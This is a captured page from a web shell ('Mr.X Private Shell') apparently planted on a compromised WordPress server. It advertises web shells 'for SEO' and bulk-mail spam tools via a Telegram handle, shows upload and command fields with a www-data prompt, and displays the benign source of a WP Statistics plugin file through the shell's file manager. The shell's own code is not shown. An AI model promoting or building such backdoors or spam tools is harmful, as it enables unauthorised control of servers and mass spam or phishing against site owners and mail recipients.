__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php

namespace WP_Statistics\Service\Admin\Exclusions;

use WP_STATISTICS\Menus;
use WP_STATISTICS\Admin_Template;
use WP_Statistics\Abstracts\BasePage;
use WP_STATISTICS\Admin_Assets;
use WP_Statistics\Service\Admin\ExportImport\ExportTypes;

class ExclusionsPage extends BasePage
{
    protected $pageSlug = 'exclusions';
    protected $dataProvider;

    public function __construct()
    {
        parent::__construct();

        $this->dataProvider = new ExclusionsDataProvider();
    }

    public function init()
    {
        $this->disableScreenOption();
    }

    public function getData()
    {
        wp_localize_script(Admin_Assets::$prefix, 'Wp_Statistics_Exclusions_Object', $this->dataProvider->getChartData());

        return $this->dataProvider->getExclusionsData();
    }

    public function render()
    {
        $args = [
            'title'         => esc_html__('Excluded Data Overview', 'wp-statistics'),
            'tooltip'       => esc_html__('Track and analyze the logs of excluded traffic based on your Filtering & Exceptions settings.', 'wp-statistics'),
            'pageName'      => Menus::get_page_slug('exclusions'),
            'DateRang'      => Admin_Template::DateRange(),
            'hasDateRang'   => true,
            'export'        => [ExportTypes::CSV_TABLE, ExportTypes::PDF_PAGE],
            'data'          => $this->getData()
        ];

        Admin_Template::get_template(['layout/header', 'layout/title', 'pages/exclusions', 'layout/footer'], $args);
    }
}

Filemanager

Name Type Size Permission Actions
ExclusionsDataProvider.php File 837 B 0644
ExclusionsManager.php File 735 B 0644
ExclusionsPage.php File 1.49 KB 0644
Filemanager